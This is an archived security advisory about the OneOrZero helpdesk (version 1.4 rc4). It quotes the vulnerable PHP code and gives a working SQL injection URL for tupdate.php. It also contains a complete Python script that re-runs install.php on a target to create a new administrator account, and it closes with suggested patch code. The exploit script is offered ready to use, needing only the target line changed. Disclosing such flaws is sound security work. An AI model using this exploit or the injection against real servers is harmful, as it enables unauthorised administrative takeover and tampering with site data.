Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: bt195.txt

OneOrZero Security Problems (PHP)





Informations :
같같같같같같같
Website : http://www.oneorzero.com
Version : 1.4 rc4
Problems :
- SQL Injection
- Admin Access

PHP Code/Location :
같같같같같같같같같

supporter/tupdate.php :

--------------------------------------------------------------------------
if($groupid == 'change'){
	$sql = "UPDATE $mysql_tickets_table set groupid=$sg where id=$id";
	$result = $db->query($sql);
}
--------------------------------------------------------------------------




admin/install.php :

----------------------------------------------------------------------------------------------------------------------------

[...]
if($step == 2){

	echo "<br><br>";
	start("Helpdesk Installation", "center");
		if($HTTP_POST_VARS['first'] == ''){
			showError("first name");
			$flag = 1;
		}
		if($HTTP_POST_VARS['last'] == ''){
			showError("last name");
			$flag = 1;
		}
		if($HTTP_POST_VARS['user'] == ''){
			showError("user name");
			$flag = 1;
		}
		if($HTTP_POST_VARS['email'] == ''){
			showError("email address");
			$flag = 1;
		}
		if($HTTP_POST_VARS['pwd1'] == '' || $HTTP_POST_VARS['pwd2'] == ''){
			showError("password");
			$flag = 1;
		}
		if($HTTP_POST_VARS['office'] == ''){
			showError("office");
			$flag = 1;
		}

		if (!checkPwd($HTTP_POST_VARS['pwd1'], $HTTP_POST_VARS['pwd2'])){
			showError("password");
			$flag = 1;
		}

		if(!validEmail($HTTP_POST_VARS['email'])){
			showError("email");
			$flag = 1;
		}


	if($flag == 1){
		endit();
		exit;
	}
[...]
	$pwd = md5($HTTP_POST_VARS['pwd1']);
	$query = "INSERT IGNORE into $mysql_users_table VALUES(NULL, 
'".$HTTP_POST_VARS['first']."', '".$HTTP_POST_VARS['last']."', 
'".$HTTP_POST_VARS['user']."', '".$HTTP_POST_VARS['email']."', '', 
'".$pwd."', '".$HTTP_POST_VARS['office']."', '".$HTTP_POST_VARS['phone']."', 
1, 1, 1, 'default', null, null, null, 0, 'English', '0')";
	$db->query($query);
[...]

----------------------------------------------------------------------------------------------------------------------------




Exploits :
같같같같
- 
http://[target]/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10
will change the description of the ticket number 10 into "abcd" 
(char(97,98,99,100))

- To exploit the second one, in python 2.2 :


--------------------------------------------------------------------------------------------------------------------------
import urlparse
import httplib
import string

OneOrZero("http://www.target.com","80","NewUserName","NewPassword")


class OneOrZero:
    def __init__(self,target,port,user,password):
        if port != "":
            self.port=str(port)
        else :
            self.port="80"
        self.path=str(urlparse.urlparse(target)[2])
        self.target=str(urlparse.urlparse(target)[1])
        self.user=str(user)
        self.password=str(password)
        self.USER_AGENT='OneOrZero.py'
        self.CreateAdminAccount()

    def CreateAdminAccount(self):

        
data='step=2&first=admin&last=admin&user='+self.user+'&pwd1='+self.password+'&pwd2='+self.password+'&email=a@a.a&office=abcd'

        try :
            print "Connecting On "+self.target+"...\n"

            http=httplib.HTTP(self.target,self.port)

            print "Sending Data On "+self.target+"...\n"

            http.putrequest("POST",self.path+"/admin/install.php")
            
http.putheader("Content-Type","application/x-www-form-urlencoded")
            http.putheader("User-Agent",self.USER_AGENT)
            http.putheader("Host",self.target)
            http.putheader("Content-Length",str(len(data)))
            http.endheaders()

            http.send(data)

            code,msg,headers = http.getreply()

            print "HTTP Code : ",str(code)
            print "HTTP Connection : ",msg
            print "HTTP headers : \n",headers,"\n"

            file=http.getfile()
            if string.find(file.read(),"Administrator Account Created 
Successfully.") != -1:
                print "Congratulations, Administrator Account Created 
Successfully."
                print "You Can Log In Here : 
http://"+self.target+self.path+"/admin/control.php"
                print "User : ",self.user
                print "Password : ",self.password
            else :
                print "Administrator Account Hasn't Been Created."

        except :
            print "Error During Admin Account Creation."
--------------------------------------------------------------------------------------------------------------------------




You just have to change the line :
OneOrZero("http://www.target.com","80","NewUserName","NewPassword")


Solution :
같같같같
A patch (and more details in French) can be found on 
http://www.phpsecure.info.

- In supporter/tupdate.php, add the lines (at the begin) :

-------------------------------------------------------------------------------------------------
foreach ($_REQUEST as $key=>$value) {

    if (get_magic_quotes_gpc()==0) {
        $value = addslashes($value); // This will reproduce the option 
magic_quotes_gpc=1
    }

    $value = str_replace('(','()',$value);

    ${$key} = $value;
    $_REQUEST[$key] = $value;
    if (isset($_POST[$key])) { $_POST[$key] = $value; }
    if (isset($_COOKIE[$key])) { $_COOKIE[$key] = $value; }
    if (isset($_FILE[$key])) { $_FILE[$key] = $value; }
    if (isset($_GET[$key])) { $_GET[$key] = $value; }
    if (isset($HTTP_POST_VARS[$key])) { $HTTP_POST_VARS[$key] = $value; }
    if (isset($HTTP_COOKIE_VARS[$key])) { $HTTP_COOKIE_VARS[$key] = $value; 
}
    if (isset($HTTP_FILE_VARS[$key])) { $HTTP_FILE_VARS[$key] = $value; }
    if (isset($HTTP_GET_VARS[$key])) { $HTTP_GET_VARS[$key] = $value; }
}
-------------------------------------------------------------------------------------------------


- In admin/install.php, put the lines :

---------------------------------------------------------------
	$sql = "SELECT * FROM $mysql_users_table WHERE id > 0";
	$result = $db->query($sql);
	$num_rows = $db->num_rows($result);
	if ($num_rows > 0){
		die("<b>OneOrZero Is Already Installed.</b>");
	}
---------------------------------------------------------------

just after :

---------------
if($step == 2){
---------------












frog-m@n

_________________________________________________________________
Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH